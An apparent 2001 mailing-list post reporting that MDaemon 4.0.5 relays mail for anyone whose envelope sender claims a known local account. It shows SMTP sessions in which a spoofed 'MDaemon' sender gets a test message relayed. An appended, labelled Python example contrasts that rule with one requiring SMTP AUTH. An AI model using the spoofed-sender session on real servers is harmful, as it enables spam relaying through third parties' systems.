Re: Relaying in MDaemon

From: Tabor J. Wells (twellsat_private)
Date: Fri Aug 17 2001 - 15:26:40 PDT


On Fri, Aug 17, 2001 at 10:49:04AM -0500,
Arvel Hathcock <arvelat_private> is thought to have said:

> > It seems that the MDaemon SMTP server can be used for
> > unauthorized relaying. Mail can be relayed when sent
> > "FROM or TO known user", it means that mail sent "from"
> > the account of one of served domains always can be relayed.
> > There is no problem to specify any "from" user, for
> > example, system account "mdaemon".
> 
> Please read the manual.  There are ways of verifying addresses.  Also, the
> default installation does not allow mail relaying.  You have enabled it
> yourself.  There is a switch setting that prevents this sort of thing and it
> is set by default.

Perhaps you should go download your product from your website and try this
yourself rather than just claiming the original poster didn't read the
documentation. I just downloaded a trial version of 4.0.5 and it relays
out of the box. 

If the envelope from you provide matches a valid user (and MDaemon is the
default installed server user) at the local domain then you can relay.

And here I had been wondering why I was getting so much spam through
MDaemon servers that the various open relay blacklists were claiming were
secure. Slightly edited examples follow.

Tabor


A random invalid user fails:

220 example.com ESMTP MDaemon 4.0.5 UNREGISTERED; Fri, 17 Aug 2001 18:11:35 -0400
ehlo blah
250-example.com Hello blah, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
mail from:<blahat_private> 
250 <blahat_private>, Sender ok
rcpt to:<twellsat_private>
550 <twellsat_private>, Recipient unknown
quit
221 See ya in cyberspace

A known valid user succeeds:

220 example.com ESMTP MDaemon 4.0.5 UNREGISTERED; Fri, 17 Aug 2001 18:11:52 -0400
ehlo blah
250-example.com Hello blah, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
mail from:<MDaemonat_private>
250 <MDaemonat_private>, Sender ok
rcpt to:<twellsat_private>
250 <twellsat_private>, Recipient ok
data
354 Enter mail, end with <CRLF>.<CRLF>
From: mdaemonat_private
To: twellsat_private
Subject: Relay Test

Blah
.
250 Ok, message saved
quit
221 See ya in cyberspace

And the relayed message it sends:



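Added example, not part of the original post and not MDaemon's code: a small model of the relay rule the two sessions above demonstrate (a known user in the envelope FROM or TO is enough), next to a rule that relays to external recipients only after SMTP AUTH. The domains, accounts, function names and the "Relaying denied" text are constructed for illustration.

```python
# Added example: models the relay rule described in the post next to a
# stricter rule. Domains, users and function names are constructed.
LOCAL_DOMAINS = {"example.com"}
LOCAL_USERS = {"mdaemon@example.com", "alice@example.com"}  # constructed accounts


def is_local_domain(addr: str) -> bool:
    return addr.rpartition("@")[2].lower() in LOCAL_DOMAINS


def is_local_user(addr: str) -> bool:
    return addr.lower() in LOCAL_USERS


def weak_policy(mail_from: str, rcpt_to: str, authenticated: bool) -> str:
    """Rule observed in the post: a known user in FROM *or* TO is enough."""
    if is_local_user(rcpt_to):
        return "250 deliver locally"
    if is_local_user(mail_from):  # envelope sender is an unverified client claim
        return "250 relay"
    return "550 Recipient unknown"


def hardened_policy(mail_from: str, rcpt_to: str, authenticated: bool) -> str:
    """Envelope sender is never proof of identity; relaying requires SMTP AUTH."""
    if is_local_domain(rcpt_to):
        return "250 deliver locally" if is_local_user(rcpt_to) else "550 Recipient unknown"
    if authenticated:
        return "250 relay"
    return "550 Relaying denied"  # constructed response text


# Constructed sessions: (MAIL FROM, RCPT TO, AUTH completed?)
SESSIONS = [
    ("blah@example.org", "someone@example.net", False),     # random sender
    ("MDaemon@example.com", "someone@example.net", False),  # claimed system account
    ("alice@example.com", "someone@example.net", True),     # authenticated user
    ("blah@example.org", "alice@example.com", False),       # ordinary inbound mail
]


def compare():
    """Return (weak, hardened) decisions for each constructed session."""
    return [(weak_policy(*s), hardened_policy(*s)) for s in SESSIONS]


if __name__ == "__main__":
    for session, (weak, hard) in zip(SESSIONS, compare()):
        print(session, "| weak:", weak, "| hardened:", hard)
```

Only the second session differs between the two rules: the weak rule relays because the client claimed a local account, while the hardened rule refuses until the session has authenticated.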